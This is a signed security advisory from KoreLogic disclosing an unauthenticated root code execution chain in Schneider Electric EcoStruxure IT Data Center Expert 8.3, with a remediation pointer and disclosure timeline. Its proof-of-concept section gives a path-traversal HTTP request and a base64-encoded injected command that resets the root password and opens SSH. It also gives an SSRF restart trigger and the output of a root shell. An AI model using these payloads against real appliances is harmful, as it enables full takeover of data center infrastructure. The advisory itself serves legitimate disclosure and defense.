-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2025-007: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution Title: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution Advisory ID: KL-001-2025-007 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-007.txt 1. Vulnerability Details Affected Vendor: Schneider Electric Affected Product: EcoStruxure IT Data Center Expert Affected Version: 8.3 and prior Platform: CentOS CWE Classification: CWE-23: Relative Path Traversal, CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CVE ID: CVE-2025-50121 2. Vulnerability Description The Data Center Expert ("DCE") appliance lacks authorization controls and allows anyone to masquerade as a NetBotz camera. A path traversal vulnerability enables an attacker to create a malicious folder name capable of injecting arguments into specific shell commands during application boot. By leveraging a separate server-side request forgery (SSRF) vulnerability, an attacker can chain these two issues to obtain a root shell from a completely unauthenticated perspective. 3. Technical Description APC NetBotz devices can be configured to report information to the Data Center Expert appliance via the DCE web application. This information contains various metrics, device alerts, and photographs. The "/botpost/surveillance" HTTP route enables devices to upload images via a multipart POST request. This route does not require authentication. When an image is uploaded, the first parameter in the POST body is loosely parsed as XML. This XML contains the variable "nbCameraUid" which is used to construct a folder name that is later created on the DCE filesystem. No input validation is done for "nbCameraUid", enabling an unauthenticated attacker to abuse dot-segments (../) and write a folder with an arbitrary name anywhere on the DCE filesystem. This behavior is dangerous, as several shell scripts exist on the appliance that leverage globbing to build commands that are later executed. For example, the "nbfunctions" script uses the following snippet to build the "ISXC_CLASSPATH" variable: for i in "$NBC_HOME"/tomcat/lib/*.jar; do ISXC_CLASSPATH="${ISXC_CLASSPATH}:${i}" done" This shell script "central.sh" uses the "ISXC_CLASSPATH" varible as an argument when starting the Tomcat web server after a reboot: "$JAVA_HOME"/bin/java -server -Dprocess.name=isxc -Djava.awt.headless=true \ $JMEM_OPTS $JGC $JMISC_OPTS ${DEBUG_OPTS:+"$DEBUG_OPTS"} $JMX_OPTS $PROFILE_OPTS \ -DMAC_ADDRESS="$MAC_ADDRESS" -DNBC_HOME="$NBC_HOME" -Duser.timezone="$NBC_TIMEZONE" \ -Duser.language="$NBC_LANG" -Duser.country="$NBC_COUNTRY" \ -Dorg.apache.cxf.Logger=org.apache.cxf.common.logging.Log4jLogger \ -Dorg.restlet.engine.loggerFacadeClass=org.restlet.ext.slf4j.Slf4jLoggerFacade \ -cp $ISXC_CLASSPATH com.netbotz.server.Main Since globbing does not differentiate between folders and files, it is possible to inject command-line arguments into the "java" invocation as long as the folder name ends with the string ".jar". To exploit this behavior, an attacker can inject the "-Xms1m", "-Xmx2m", and "XX:OnOutOfMemoryError" arguments, which severely limit the total memory allocated for the "java" runtime. The value of the "XX:OnOutOfMemoryError" argument will be executed as an additional shell command whenever this limited memory is exhausted. 4. Mitigation and Remediation Recommendation Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric's Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf. 5. Credit This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2025-02-14 : KoreLogic reports vulnerability details to Schneider Electric CPCERT. 2025-02-17 : Vendor acknowledges receipt of KoreLogic's submission. 2025-02-25 : Vendor confirms the reported vulnerability. 2025-02-28 : Vendor requests a meeting with KoreLogic to discuss the timeline of remediation efforts for this vulnerability, as well as for associated submissions from KoreLogic. 2025-03-04 : KoreLogic and Schneider Electric agree to embargo vulnerability details until product update 9.0, circa July, 2025. 2025-06-20 : Vendor notifies KoreLogic that the publication date for this vulnerability will be 2025-07-08. 2025-07-08 : Vendor public disclosure. 2025-07-09 : KoreLogic public disclosure. 7. Proof of Concept As a proof-of-concept, the following HTTP request can be sent to the DCE appliance: POST /botpost/surveillance HTTP/1.1 Host: victim.com Content-Length: 1010 Content-Type: multipart/form-data; boundary=09b3621e3cb4509abb3722922089bc54 --09b3621e3cb4509abb3722922089bc54 Content-Disposition: form-data; name="foo"; filename="" Content-Type: application/xml somePrefix timestamp="1627896543210" someMiddleData nbSerialNum00:00:00:00:00:00< someMiddleData someMiddleData someSuffix --09b3621e3cb4509abb3722922089bc54 Content-Disposition: form-data; name="bar"; filename="korelogic.jpeg" Content-Type: image/jpeg z --09b3621e3cb4509abb3722922089bc54-- This will create a maliciously named folder in the "/usr/local/netbotz/nbc/tomcat/lib/" directory: [root@dce ~]# ls /usr/local/netbotz/nbc/tomcat/lib/ catalina.jar catalina-optional.jar commons-modeler-2.0.1.jar jsp-api.jar naming-factory.jar naming-resources.jar servlet-api.jar tomcat-ajp.jar tomcat-coyote.jar tomcat-http.jar tomcat-util.jar 'zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar' When the Tomcat server reboots (either during a system upgrade or user initiated), the folder name is globbed and successfully injects arguments into the "java" invocation: [root@dce ~]# ps aux | grep tomcat root 73359 0.0 0.1 7384952 37052 ? Sl 02:26 0:00 /etc/alternatives/jre/bin/java -cp :/usr/local/netbotz/nbc/jars/activation-1.1.jar:...:/usr/local/netbotz/nbc/tomcat/lib/tomcat-util.jar:/usr/local/netbotz/nbc/tomcat/lib/zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar com.netbotz.server.tools.NBVars -g nbc.timezone Due to the injected "Xms" and "Xmx" flags, an "OutOfMemory" error is thrown, and the following shell commands are executed (after being base64 decoded): echo root:korelogic | chpasswd; systemctl start sshd; iptables -I INPUT -p tcp --dport 22 -j ACCEPT This effectively changes the "root" password to the string "korelogic", enables SSH, and modifies the firewall rules to allow access to port 22 (TCP), enabling an attacker to SSH into the appliance. [goon@security struxureware]$ ssh -t root@192.168.2.90 id root@192.168.2.90's password: uid=0(root) gid=0(root) groups=0(root) Connection to 192.168.2.90 closed. When port 80 is enabled, an attacker can leverage a separate server-side request forgery (SSRF) vulnerability (CVE-2025-50125/KL-001-2025-011) in the "/plugins" route and force a restart of the Tomcat server by sending a malformed HTTP request. Take for example the following HTTP request: rnmf /plugins HTTP/1.1 Host: 127.0.0.1:7613 Connection: keep-alive The DCE web application unsafely proxies this request to a Java service only accessible via the loopback interface. The following snippet is from the decompiled JAR responsible for this service: while (true) { final InetAddress local = InetAddress.getByName("127.0.0.1"); final ServerSocket server = new ServerSocket(7613, 5, local); final Socket connect = server.accept(); this.logger.debug((Object)"Received socket connection..."); final BufferedReader in = new BufferedReader(new InputStreamReader(connect.getInputStream())); String val = in.readLine(); if (val == null) { val = ""; } final boolean doReboot = val.startsWith("rnmf"); The code indicates that when a stream of data begins with the ASCII characters "rnmf" it is interpreted as a "reboot" instruction, and subsequently stops and starts the Tomcat server. KoreLogic created a proof-of-concept script named "unauth2shell.py" that leverages these two vulnerabilities to obtain a shell as the "root" user from a completely unauthenticated perspective. [attacker@box]$ python unauth2shell.py [~] Creating malicious folder... [+] Created malicious folder [~] Restarting application... [+] Restart successfully initiated [~] Polling... [~] Polling... [~] Polling... [~] Polling... [~] Polling... [+] Restart successful [root@dce ~]# id uid=0(root) gid=0(root) groups=0(root) The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy -----BEGIN PGP SIGNATURE----- iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmhurYIaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkenPrQ/8CtH1sbUOFS7Q4DusWNQg xRT7kSDZjsTH7r5rSSAxSnMwn8wGNCh+mMtCkffZ5RBIJUmkMXZByaOQk2R+ho4m v4142lmVu5G8TszLJClv3OjmcsPxncjNCsob9Rr0fvSSFjppPrCJy4R+1wOib+wb gB0smo1gApvP4WmeV+YUb9eCE0HubyR7r0V2wX/Z9RRyOjOTDnQo6k+nbomoVo1+ XpLWdb5kJSXsON2Avuh5O3/o6sOUALTMyQuEEhMCymT8ytWUTbLVoPAXlWrlzP96 wnLYDt+4/D9Lt8lERcZFBY3DRX2HRrC51IPCWZ/3uf1u65MQkWo2LAk0pEps0eOH AlZ09OgMQnzA5Z1qXsMuoZIq3hj3L9rcjA5P7EQKzcPGBguGHS5tck/EDY+g/VvY ejD5M/rKAXBq2lxnEiwl4rZpLnVrunALRQEfDwNOgXWGzZODuRMJbvc4UlnUNfOd GSV4/XYURx06RDXweW2tBmBhpY+5y/TUyJl4l+jMVQexZsa3T0It7kn76UAt6uxg nQ5dF7Wb/eJwTKW3Q1RfrHyDlbfyRqrTBWiuQaXC/Nd4VLzBKpVmZeKLtltG3KCJ 3LwgJMPfI/vhq3rdrcPvzKCrY3uwJt+knKgrx3mLQA2LOqEPCm6XRg8esSkDsNxa r1DLRT70eMkHt6L3yvZDrFk= =U7mY -----END PGP SIGNATURE-----